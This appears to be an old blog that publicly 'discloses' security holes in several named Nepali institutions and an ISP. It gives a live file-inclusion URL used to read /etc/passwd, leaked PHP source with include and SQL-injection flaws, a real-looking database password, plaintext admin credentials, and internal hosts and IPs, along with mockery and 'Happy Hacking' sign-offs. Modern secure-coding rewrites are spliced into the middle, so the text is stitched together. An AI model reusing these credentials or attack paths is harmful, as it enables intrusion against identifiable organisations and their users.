I was checking the site of Little Angels College of Management when they were here in KU for the sports week, and after a while I found it to be vulnerable to a file inclusion vulnerability.
Vulnerable URL is:
http://lacm.edu.np/?lacm=[any_file_to_include]
/etc/passwd:
And I also got the SQL DB... what the hell, they are keeping the database backup in the website root folder itself.
See you guys.
Sunday, 25 April 2010
Saturday, 31 October 2009
Venus.com.np Security Disclosure
Venus.com.np Hackz:
Last 4 lines of .htaccess:
AuthType Basic
AuthName www.venus.com.np
AuthUserFile /home/venus/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/venus/public_html/_vti_pvt/service.grp
Example of poor coding:
<?php
$inc = $_GET['page'] . '.php';
if ($inc == '.php') $inc = 'home.php';
//echo $inc;
?>
Nothing more to say. You know how vulnerable they are. Happy Hacking!!! :)
Hitechacademy Security Disclosure
Hi there,
In this post, I am going to disclose the security issues of Hitech Academy, which gives computer training to many students. Though it says it's one of the best in Nepal, it knows nothing about security. So I thought to disclose them...
Learn some coding, Hitech guys. The manager had told me in my interview that he has got some of the best paid programmers from Nepal and you (meaning I) can't compete with them, so sorry for this time.
From index.php:
if(isset($_GET['action']))
{
include("includes/".$_GET['action'].".php");
}
WTF? Don't you know how to validate variables? Sucks... Poor coding.
From DBConnection file:
<?php
$dbuser="hitechac_hitech";
$dbpassword="hitech";
$database="hitechac_hitech";
$host = "localhost";
$ado=new data($host,$dbuser,$dbpassword,$database);
?>
From one of the functions file:
function adminLogin($username, $password)
{
global $ado;
global $userGroups;
$sql = "SELECT u.* FROM users u, usergroups ug WHERE u.username = '$username' AND u.password = '$password'
AND u.userGroupId = ug.id AND ug.name = 'admin'";
$result = $ado->exec($sql);
if ($ado->count_row($result) > 0)
{
//login successful
$row = $ado->fetch_array($result);
$_SESSION['userId'] = $row['id'];
$_SESSION['userFullname'] = $row['fullname'];
$_SESSION['userUsername'] = $row['username'];
$_SESSION['userGroupId'] = $row['userGroupId'];
$gResult = $userGroups->getById($row['userGroupId']);
$gRow = $ado->fetch_array($gResult);
$_SESSION['userGroupPower'] = $gRow['power'];
$_SESSION['userGroupName'] = $gRow['name'];
return true;
}
//invalid login
return false;
}
WTF? Don't you know an SQLi vuln is very bad?
Hitech email login PHP script snippet:
<?
session_start();
if (isset($_POST['Submit']))
{
if ($_POST['username'] == "hitechemail" && $_POST['password'] == "emailhitech")
{
$_SESSION['userId'] = "hitech";
header("Location: index.php");
exit();
}
}
?>
LOL... passes in plain form. Learn to use md5(), hitech.
To Hitech Academy, please make corrections in the following information from your site (do not hide the truth from your clients; just say how lame you are...):
HiTech Academy is an institution established with the aim of providing (non-)quality education and training in the field of Basic (and Advance; remove this) Computing, Computer Accounting, Hardware and Networking, (Add insecure) Computer Programming, Web Designing, Tele-communications, English Language and Personality Development and a host of other allied subjects. It also provides job placement services to its students as well as other job seekers.
HimalTech [ISP] Security Disclosure
This is a minor one (at least I think). Himaltech is an ISP from Nepal (though I had never heard of it). First thing, don't host on a Windows system; use a free and open source Linux distro... They are cheaper, I think.
From index.php (exploitable snippet):
if(($p == "") && ($q != "")){
$filename = $q;
} elseif($p != ""){
$filename = $p."/content";
} else {
$filename = "home";
}
include($filename.$ext);
WTF? How are you making includes? Fucking noobish.
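The same unvalidated-include pattern shows up in the venus.com.np `?page=` snippet, the Hitech `?action=` include and the HimalTech `$p`/`$q` dispatch above. As an added example that is not code from any of those sites, here is the dispatcher rewritten so the request parameter only ever selects from a fixed allowlist; the `PAGES` table and the `pages/` directory are assumptions for the demonstration.

```php
<?php
// Added example, not code from venus.com.np, Hitech Academy or HimalTech:
// the ?page= include rewritten so user input never reaches a filesystem path.
declare(strict_types=1);

// Every page the site can serve, keyed by the value accepted in the URL.
// Nothing from the request is concatenated into a path; the request value is
// only a lookup key (assumed table for this demonstration).
const PAGES = [
    ''        => 'home.php',   // no parameter: same default as the original
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null for anything not allowlisted.
function safeIncludePath(string $page, string $baseDir): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;   // traversal strings, remote URLs, unknown names: all end here
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;   // pages/ missing: fail closed rather than include from cwd
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . PAGES[$page]);
    // Defence in depth: even an allowlisted entry must resolve inside $baseDir
    // (catches a bad PAGES entry or a symlink planted in the pages directory).
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Dispatch in index.php: unknown pages get a 404 instead of a PHP include
// warning that leaks the server path (as the commented-out "echo $inc" would).
$page = $_GET['page'] ?? '';
if (!is_string($page)) {
    $page = '';            // ?page[]=x would otherwise be an array
}
$path = safeIncludePath($page, __DIR__ . '/pages');
if ($path === null) {
    http_response_code(404);
    exit('Not found');
}
include $path;
```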
From one of the PHP scripts:
$query = "UPDATE newsFeed set date='". $_POST['dated'] ."' WHERE id='". $_POST['id'] ."'";
Oh hell. Learn to validate the inputs. What would have happened if an evil user had submitted some malformed information?
Some configs from functions.php:
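Both the Hitech `adminLogin()` query and this HimalTech `UPDATE` build SQL by string concatenation. As an added example (not the code of either site), here are the two rewritten with PDO prepared statements, with the password check moved out of the SQL text into `password_verify()`; column names follow the original snippets, `$db` is assumed to be a PDO connection, and `users.password` is assumed to hold `password_hash()` output.

```php
<?php
// Added example, not Hitech Academy's or HimalTech's code: their two queries
// with bound parameters, and password verification done in PHP, not in SQL.
declare(strict_types=1);

function adminLogin(PDO $db, string $username, string $password): bool
{
    // Placeholders: the driver sends $username as data, never as SQL text, so a
    // quote in it cannot change the query. The password is deliberately not in
    // the WHERE clause; the stored hash is fetched and verified below instead.
    $stmt = $db->prepare(
        'SELECT u.id, u.fullname, u.username, u.password, u.userGroupId,
                ug.power, ug.name
           FROM users u JOIN usergroups ug ON u.userGroupId = ug.id
          WHERE u.username = :username AND ug.name = :grp'
    );
    $stmt->execute([':username' => $username, ':grp' => 'admin']);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against a dummy hash when the user does not exist, so response
    // time does not reveal which admin usernames are valid.
    static $dummy = null;
    $dummy ??= password_hash('not-a-real-password', PASSWORD_DEFAULT);
    $hash = ($row !== false) ? $row['password'] : $dummy;
    if (!password_verify($password, $hash) || $row === false) {
        return false;   // invalid login
    }
    session_regenerate_id(true);   // new session id on privilege change
    $_SESSION['userId']         = $row['id'];
    $_SESSION['userFullname']   = $row['fullname'];
    $_SESSION['userUsername']   = $row['username'];
    $_SESSION['userGroupId']    = $row['userGroupId'];
    $_SESSION['userGroupPower'] = $row['power'];
    $_SESSION['userGroupName']  = $row['name'];
    return true;
}

// The HimalTech newsFeed UPDATE with bound parameters; the id is bound as an
// integer so only a number can ever reach the WHERE clause.
function updateNewsDate(PDO $db, int $id, string $dated): int
{
    $stmt = $db->prepare('UPDATE newsFeed SET date = :dated WHERE id = :id');
    $stmt->bindValue(':dated', $dated, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();   // rows changed; 0 means no such id
}
```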
<?php
$isp[lname] = "HimalTech Internet Services";
$isp[sname] = "HimalTech";
$isp[sup_tel] = "443-9541, 01-621-8615";
$isp[gen_tel] = "+977 (1) 44 39 541";
$isp[sup_email] = "support@himaltech.com";
$isp[gen_email] = "info@himaltech.com";
$radHost = "himaltech.com";
$radUser = "phpmgmt";
$radPass = "**EDITED**";
$radName = "radius";
$newsHost = localhost;
$newsUser = "himal";
$newsPass = "**EDITED**";
$newsName = "ht";
............
...........
?>
And some arrays:
$nas = array(
"69.88.8.94" => array("port" => 30, "name" => "Dhau"),
"10.0.0.3" => array("port" => 30, "name" => "vold_dhau"),
"202.161.146.197" => array("port" => 30, "name" => "old_dhau"),
"202.161.146.209" => array("port" => 30, "name" => "dhauold")
);
So that was the show on himaltech. Happy hacking!!! :)